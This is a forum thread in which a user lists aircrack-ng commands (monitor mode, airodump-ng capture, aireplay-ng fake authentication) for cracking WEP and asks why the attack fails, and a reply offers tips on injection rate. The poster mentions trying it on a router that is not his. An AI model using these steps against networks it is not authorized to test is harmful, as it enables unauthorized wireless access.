Results 1 to 2 of 2

Thread: [RT73]Attack was unsuccessful when Sending Authentication Request

  1. #1
    Just burned his ISO
    Join Date
    Jan 2009
    Posts
    1

    Default [RT73]Attack was unsuccessful when Sending Authentication Request

    I guess the most important command that we must get it to work is the command that will generate fake packets (clientless attack) but before that, we need to get Authentication Request working.

    I have a D-Link DWA-110 adapter and running Backtrack 3 Final. This is what I've done.

    1. Boot up Backtrack3 without connecting the DWA-110 adapter.
    2. I downloaded latest RT73 driver rt73-k2wrlz-3.0.2.tar.bz2
    3. Extract.
    4. make.
    5. CD to Module folder and type make install
    6. Then I connect the adapter
    7. Type this modprobe rt73
    8. Type iwconfig rausb0 mode monitor
    9. Type iwconfig rausb0 rate 1M
    10. Type iwpriv rausb0 rfmontx 1

    Steps to start cracking.
    11. airodump-ng rausb0
    12. airodump-ng -c 6 -w wep123 --bssid (bssid) rausb0
    13a. aireplay-ng -1 0 -a (bssid) -h (macadd) -e (ssid) rausb0

    OR (I've also tried the following command)

    13b. aireplay-ng -1 6000 -o 1 -q 10 -e (ssid) -a (bssid) -h (macadd) rausb0

    I got this result.

    Sending Authentication Request (Open System)
    Attack was unsuccessful. Possible reasons:

    * Perhaps MAC address filtering is enabled.
    * Check that the BSSID (-a option) is correct.
    * Try to change the number of packets (-o option).
    * The driver/card doesn't support injection.
    * This attack sometimes fails against some APs.
    * The card is not on the same channel as the AP.
    * You're too far from the AP. Get closer, or lower the transmit rate.

    I have 2 wireless routers. One AP (aztech) worked flawlessly and I can crack it without problems but I couldn't crack another one (Prolink). The wireless router that I cannot crack also belongs to me, I checked and mac address filtering is NOT enabled. BSSID is correct. I've also changed the number of packets (see the second command). The AP is very near me. I am also sure that the card is on the same channel as AP because otherwise it cannot even send.

    My question is, why couldn't my Prolink router accept this request? In fact I've tried on another AP (3rd router) which don't belong to me and it also cannot accept the authentication request. I thought a lot of routers are open to this attack?

    Any advice would be much appreciated.

  2. #2
    Senior Member secure_it's Avatar
    Join Date
    Feb 2010
    Location
    在這兩者之間 BackTrack是4 FwdTrack4
    Posts
    854

    Default

    Attack was unsuccessful. Possible reasons:

    * Perhaps MAC address filtering is enabled.
    * Check that the BSSID (-a option) is correct.
    * Try to change the number of packets (-o option).
    * The driver/card doesn't support injection.
    * This attack sometimes fails against some APs.
    * The card is not on the same channel as the AP.
    * You're too far from the AP. Get closer, or lower the transmit rate.
    and second when you are near AP then why there is need to set rate @ 1M.as the basic funda is if AP is far enough lower the injection rate e.g. 5.5.M or 1M.if AP is near enough increase the injection rate and also look for the same spectrum devices like microwave own etc as they interfere in between communication.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •